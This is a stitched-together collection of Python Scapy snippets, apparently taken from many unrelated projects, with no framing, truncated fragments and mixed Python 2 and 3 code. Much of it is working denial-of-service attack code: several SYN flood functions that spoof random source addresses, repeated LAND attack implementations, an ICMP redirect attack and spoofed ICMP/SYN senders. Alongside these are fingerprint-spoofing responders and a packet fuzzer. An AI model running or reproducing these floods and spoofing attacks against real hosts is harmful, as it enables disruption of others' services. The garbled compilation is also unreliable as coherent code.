def icmp_redirect(ip_gw, ip_victim, ip_attacker, ip_targetroute):
"""Try ICMP Redirect attack
Args:
ip_gw (str): Gateway IP
ip_victim (str) : Target/Victim IP
ip_attacker (str) : Attacker IP
ip_targetroute (str) : IP of network to reach in ICMP payload
interface ???
"""
ip = IP()
ip.src = ip_gw
ip.dst = ip_victim
icmp = ICMP()
icmp.type = 5
icmp.code = 1
icmp.gw = ip_attacker
ip2 = IP()
ip2.src = ip_victim
ip2.dst = ip_targetroute
icmp2 = ICMP()
icmp2.type = 0
icmp2.code = 0
# Send packets at Layer 3(Scapy creates Layer 2 header), Does not recieve any packets.
send(ip / icmp / ip2 / icmp2, iface="eth1")
def run(self):
# Damn, ugly!
global forging
if forging:
i = IP()
i.dst = ip
if spoofing:
i.src = '.'.join(
random.randint(1, 254) for _ in range(4))
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
try:
send(i / t, verbose=0)
except PermissionError:
print('ohno, not forging')
forging = False
else:
s = socket.socket()
s.connect((self.ip, self.port))
def cmd_land(ip, count, port, iface, verbose):
conf.verb = False
if iface:
conf.iface = iface
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def service_craft(pkt, fp, mac, service, type_=False):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.ttl, 16)
ip.flags = 0x4000
tcp = TCP()
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
if type_:
tcp.flags = 0x018 # PSH / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].ack
data = service[pkt[TCP].dport]
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
return fin_pkt
else:
tcp.flags = 0x012 # SYN / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].seq + 1
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = ICMP() print "Spoofing %s to send ICMP ..." % i.src sr1(i/ICMP,verbose=0)
def doSynFlood(origin_ip=None, origin_port=None,
target_ip=None, target_port=None,
interface=None, duration=None, gap=0):
'''
Starts Syn Flood attacks
Arguments:
origin_ip (str): attacker ip
origin_port (int): attacker port
target_ip (str): target ip
target_port (int): target port
interface (str): network interface to use
duration (int): duration of the attack
gap (int): gap (delay) between packets
Returns:
None
'''
# Check if everything is filled out
if target_ip is None:
return
if target_port is None:
return
if duration is None:
return
if gap >= duration:
return
# Prepare the packet
ip_layer = IP()
ip_layer.src = origin_ip
ip_layer.dst = target_ip
tcp_layer = TCP()
tcp_layer.sport = origin_port
tcp_layer.dport = target_port
tcp_layer.flags = "S"
# Prepare timings
time_start = time()
time_end = time_start + duration
# Start attack
while (time() <= time_end): #duration
# Constantly changing values
tcp_layer.seq = GenerateRandomSafeSeq()
tcp_layer.ack = GenerateRandomSafeSeq()
tcp_layer.window = GenerateRandomWindow()
attack_packet = ip_layer/tcp_layer # packet to send
send(attack_packet, iface=interface)
if gap > 0:
sleep(gap) #gap
def seqgen_pkt_craft(pkt, fp, mac, pno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['T1']['TTL'], 16)
ip.flags = fp.probe['T1']['DF']
ip.id = fp.ip_id_gen()
tcp = TCP()
s_val = fp.probe['T1']['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = fp.tcp_seq_gen()
a_val = fp.probe['T1']['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe['T1']['F']
tcp.flags = flag_val
tcp.window = fp.probe['WIN']['W' + pno]
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
tcp.options = fp.probe['OPS']['O' + pno]
rd_val = fp.probe['T1']['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def run(self):
print "Starting %s %s %d" % (self.name, self.target, self.port)
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = ICMP()
print "Spoofing %s to send ICMP ..." % i.src
sr1(i / ICMP, verbose=0)
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = TCP() t.dport = self.port t.flags='S' print "Spoofing %s to send SYN ..." % i.src sr1(i/t,verbose=0)
def syn_flood(self, target, port):
from scapy.all import IP, TCP, send
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65500)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def udp_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['U1']['TTL'], 16)
ip.flags = fp.probe['U1']['DF']
ip.len = 56
ip.id = 4162
icmp = ICMP()
icmp.type = 3
icmp.unused = 0
icmp.code = 13 # code 3 for reply
iperror = IPerror()
iperror.proto = 'udp'
iperror.ttl = 0x3E
iperror.len = fp.probe['U1']['RIPL']
iperror.id = fp.probe['U1']['RID']
ripck_val = fp.probe['U1']['RIPCK']
if ripck_val == 'G':
pass
elif ripck_val == 'Z':
iperror.chksum = 0
else:
iperror.chksum = pkt[IP].chksum
udperror = UDPerror()
udperror.sport = pkt[UDP].sport
udperror.dport = pkt[UDP].dport
udperror.len = pkt[UDP].len
if fp.probe['U1']['RUCK'] == 'G':
udperror.chksum = pkt[UDP].chksum
else:
udperror.chksum = fp.probe['U1']['RUCK']
try:
ipl = int(fp.probe['U1']['IPL'], 16)
except KeyError:
ipl = None
data = pkt[Raw].load
fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data
return fin_pkt
def run(self):
print "Starting %s %s %d" % (self.name, self.target, self.port)
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.dport = self.port
t.flags = 'S'
print "Spoofing %s to send SYN ..." % i.src
sr1(i / t, verbose=0)
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = self.target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = self.port
t.flags = 'S'
send(i / t, verbose=0)
def run(self):
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
send(i/t, verbose=0)
def run(self):
packet_ip = IP()
packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254))
packet_ip.dst = self.host
packet_tcp = TCP()
packet_tcp.sport = random.randint(1024, 65535)
packet_tcp.dport = self.port
packet_tcp.flags = 'S'
send(packet_ip/packet_tcp)
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
conf.iface = iface
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def ecn_craft(pkt, mac, fp):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['ECN']['TTL'], 16)
ip_flag = fp.probe['ECN']['DF']
if ip_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0
ip.id = fp.ip_id_gen()
tcp = TCP()
w_val = fp.probe['ECN']['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
cc_val = fp.probe['ECN']['CC']
if cc_val == 'Y':
tcp.flags = 0x52
elif cc_val == 'N':
tcp.flags = 0x12
elif cc_val == 'S':
tcp.flags = 0xD2
else:
tcp.flags = 0x10
o_val = fp.probe['ECN']['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def IP_layer(attributes):
layer3 = IP()
layer3.version = attributes['version']
layer3.ihl = attributes['ihl']
layer3.tos = attributes['tos']
layer3.len = attributes['len']
layer3.id = attributes['id']
layer3.flags = attributes['flags']
layer3.frag = attributes['frag']
layer3.ttl = attributes['ttl']
layer3.proto = attributes['proto']
layer3.src = attributes['src']
layer3.dst = attributes['dst']
return layer3
def three_way_handshake(ip_dst, sniffer, port_num):
ip = IP(ttl=255)
ip.src = MY_IP
ip.dst = ip_dst
tcp = TCP(
sport=port_num,
dport=443,
flags='S',
seq=1000,
window=65535,
options=[("MSS", MSS_SIZE), ('WScale', 10)])
SYNACK = sr1(ip / tcp, verbose=False, timeout=2)
if not SYNACK:
return "NOSYNACK"
tls = TLSRecord() / TLSHandshakes(handshakes=[
TLSHandshake() / TLSClientHello(
compression_methods=list(range(0xff))[::-1],
cipher_suites=list(range(0xff)))
])
tls_raw = str(tls)
ptr = 0
current_ack = SYNACK.ack
if SYNACK.seq is None:
return "SYNACKERROR"
while ptr < len(tls_raw):
ACK = TCP(
sport=port_num,
dport=443,
flags='A',
seq=current_ack,
ack=SYNACK.seq + 1,
window=65535,
options=[("MSS", MSS_SIZE), ('WScale', 10)])
tls_frag = tls_raw[ptr:ptr + MSS_SIZE]
send(ip / ACK / tls_frag, verbose=False)
ptr += MSS_SIZE
current_ack += len(tls_frag)
sniffer.client_hello_sent = True
return "SUCCESS"
def source_fix(dummy, this_packet):
"""
Called when a PnPIPsec message arrives to handle the message.
"""
print "source_fix"
# parse the message and its type
pkt = IP(this_packet.get_data())
#print "+++++++++++++++++++++++++++++++++"
#print pkt.show()
#print "+++++++++++++++++++++++++++++++++"
#print "---------------------------------"
if (type(pkt[TCP].payload) is not packet.NoPayload):
response = pickle.loads(str(pkt[TCP].payload))
print "changing source to ", response.real_src
print dir(pkt)
pkt.src = response.real_src
this_packet.set_verdict(nfqueue.NF_ACCEPT)
def start(self):
"""Creats the SYN packets and sends it continuously to the target ports"""
# Create the IP layer
ip = IP(dst=self.target_ipv4)
if (self.spoof_ip is not None):
ip.src = self.spoof_ip
# Create the SYN
tcp = TCP(sport=RandShort(),
dport=self.target_ports,
flags="S",
seq=42)
print("[*] SYN flood Started")
# Continously send SYNs to the target ports
send(ip / tcp, verbose=False, loop=True)
def sendSYN(host, port):
# Create an IP Packet using random ip as source and the target IP as destination
ipPacket = IP()
ipPacket.src = ".".join(
map(str, (random.randint(0, 255) for i in range(4))))
ipPacket.dst = host
# Create a TCP segment using a random source port and the target port as the destination
tcpSegment = TCP()
tcpSegment.sport = random.randint(1000, 65535)
tcpSegment.dport = port
# Set the syn flag
tcpSegment.flags = 'S'
# Send the composition of the two (package/segment) and ignore the result
send(ipPacket / tcpSegment, verbose=0)
pass
def flood(target):
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}")
else:
print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def syn_flood(ip_destination, port_destination, limit):
total = 0
print("Enviando Pacotes")
for x in range(0, limit):
ip_packet = IP()
ip_packet.src = ".".join(
map(str, (random.randint(0, 255) for _ in range(4))))
ip_packet.dst = ip_destination
tcp_packet = TCP()
tcp_packet.sport = random.randint(1000, 9000)
tcp_packet.dport = port_destination
tcp_packet.flags = "S"
tcp_packet.seq = random.randint(1000, 9000)
tcp_packet.window = random.randint(1000, 9000)
print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport))
send(ip_packet / tcp_packet, verbose=0)
total += 1
print("All packets sent")
def icmp_craft(pkt, fp, mac):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['IE']['TTL'], 16)
dfi_flag = fp.probe['IE']['DFI']
if dfi_flag == 'N':
ip.flags = 0
elif dfi_flag == 'S':
ip.flags = pkt[IP].flags
elif dfi_flag == 'Y':
ip.flags = 2
else:
ip.flags = 0 if pkt[IP].flags == 2 else 2
ip.id = fp.ip_id_icmp_gen()
icmp = ICMP()
icmp.type = 0
icmp.id = pkt[ICMP].id
cd_val = fp.probe['IE']['CD']
if cd_val == 'Z':
icmp.code = 0
elif cd_val == 'S':
icmp.code = pkt[ICMP].code
else:
icmp.code = random.randint(0, 15)
icmp.seq = pkt[ICMP].seq
data = pkt[ICMP].payload
fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data
return fin_pkt
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(f"[{red} bold][✘] ERROR[/{red} bold] " +
f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}")
else:
print(f"[{green}][✔] SUCCESS[/{green}] " +
f"[{yellow}]SYN packet sent to[{yellow}] " +
f"[{blue}]{'{}:{}'.format(*target)}")
def main(args):
print "[*] Comenzando el fuzzing..."
pkt_lst = []
for i in xrange(args.count):
ip_layer = IP(dst=args.target)
# Fuzz IP layer
#
# Src ramdon?
if random_bool():
ip_layer.src = str(RandIP())
# IP ID
if random_bool():
ip_layer.id = int(RandShort())
# IP TTL
if random_bool():
ip_layer.ttl = int(RandInt()) % 255
icmp_layer = ICMP()
# Fuzz ICMP layer
#
# Type random
if random_bool():
icmp_layer.type = int(RandByte())
# Seq random
if random_bool():
icmp_layer.seq = int(RandShort())
pkt = ip_layer/icmp_layer
pkt_lst.append(pkt)
sendp(pkt_lst, inter=args.interval)
print "[*] Enviado %s paquetes" % i
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(e)
else:
print("[+] SYN packet sent!")
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(
f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}"
)
else:
print(
f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m"
)
])
for arg, opts in args.items():
p.add_argument(arg, **opts)
if __name__ == "__main__":
args = p.parse_args()
count = 0
try:
if args.dest_ip in ("127.0.0.1", "localhost"):
conf.L3socket = L3RawSocket
ip = IP(dst=args.dest_ip)
if args.source_ip is not None:
ip.src = args.source_ip
udp = UDP(dport=args.port)
if args.incr_seq:
seq = args.seq_number
if args.loop:
while True:
pkt = ip/udp/(
PACKET_FORMAT % (args.rfid_tag, args.direction, seq))
send(pkt)
count += 1
seq += 1
else:
i = 0
def configureIP(ip):
IP_Packet = IP()
IP_Packet.src = randomIP()
IP_Packet.dst = ip
return IP_Packet
#!/usr/bin/python
from scapy.all import IP, TCP
a = IP()
a.src = "1.2.3.4"
a.dst = "10.0.2.15"
a.ihl = 5
b = TCP()
b.sport = 1551
b.dport = 23
b.seq = 1551
b.flags = 'S'
pkt = a/b
with open("packet", "wb") as f:
f.write(bytes(pkt))
#/usr/bin/python
from scapy.all import IP, UDP, DNS, DNSQR, send
# Get all input about DNS package.
destination_input = str(raw_input('What is your DNS server which you want to resolve from? :: '))
source_input = str(raw_input('What is your source ip address which you want to send DNS request from? :: '))
query_input = str(raw_input('What is the address which will be queried by DNS server? :: '))
# Create ip, udp and dns packages.
i = IP(dst=destination_input)
i.src = source_input
u = UDP(dport=53)
d = DNS(rd=1,qd=DNSQR(qname=query_input))
# Print all information.
print ""
print "Information"
print "==========="
print "Source IP : %s" %source_input
print "Destination IP: %s" %destination_input
print "DNS Query : %s" %query_input
print ""
print "Package details"
print "==============="
print ""
print i.show()
print ""
print u.show()
print ""
print d.show()
#*** Get parameters from command line
SRC_MAC = sys.argv[1]
DST_MAC = sys.argv[2]
SRC_IP = sys.argv[3]
DST_IP = sys.argv[4]
IF_NAME = sys.argv[5]
REPEAT_INTERVAL = float(sys.argv[6])
REPEAT_COUNT = int(sys.argv[7])
data = "blahblahblah"
# define ip and icmp
eth = Ether()
eth.src=SRC_MAC
eth.dst=DST_MAC
ip = IP()
ip.src = SRC_IP
ip.dst = DST_IP
icmp = ICMP()
icmp.type = 8
icmp.code = 0
finished = 0
count = 0
while not finished:
sendp(eth/ip/icmp/data, iface=IF_NAME)
time.sleep(REPEAT_INTERVAL)
count += 1
if count >= REPEAT_COUNT:
finished = 1
def t2tot7_craft(pkt, fp, mac, tno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe[tno]['TTL'], 16)
ip.flags = fp.probe[tno]['DF']
ip.id = random.randint(1, 1000)
tcp = TCP()
s_val = fp.probe[tno]['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = pkt[TCP].ack + 369
a_val = fp.probe[tno]['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe[tno]['F']
tcp.flags = flag_val
w_val = fp.probe[tno]['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
o_val = fp.probe[tno]['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
rd_val = fp.probe[tno]['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
ip_source[index] = ""
print(ip_source)
print(ip_dest)
ip_header.version = 4
ip_header.ihl = ip_hdr_len // 4
ip_header.tos = 0x0
ip_header.len = (ip_hdr_len + udp_pkt_len)
ip_header.id = 0
ip_header.flags = 0
ip_header.frag = 0
ip_header.ttl = 64
ip_header.proto = 17
#ip_header.chksum= 0x7ce6
ip_header.src = ip_src
ip_header.dst = ip_dst
del ip_header.chksum
ip_header = ip_header.__class__(str(ip_header))
#ip_header.show2()
#print("-------------------------------------")
#hexdump((ip_header.version << 4) | ip_header.ihl)
#print(ip_header.version << 4)
#print(ip_header.ihl)
#print(ip_header.proto)
#hexdump(ip_header)
#ip_pkt_len = ip_hdr_len + udp_pkt_len
#ip_version = 4
#ip_ihl = ip_hdr_len // 4
